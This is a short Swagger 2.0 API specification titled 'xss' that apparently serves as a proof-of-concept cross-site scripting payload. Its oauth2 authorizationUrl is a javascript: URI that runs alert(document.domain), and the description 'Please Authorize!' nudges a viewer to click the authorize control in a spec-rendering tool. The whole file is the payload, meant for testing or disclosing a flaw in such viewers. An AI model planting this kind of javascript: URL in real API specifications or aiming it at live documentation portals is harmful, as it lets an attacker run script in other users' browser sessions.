swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: xss
  description: Please Authorize!
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
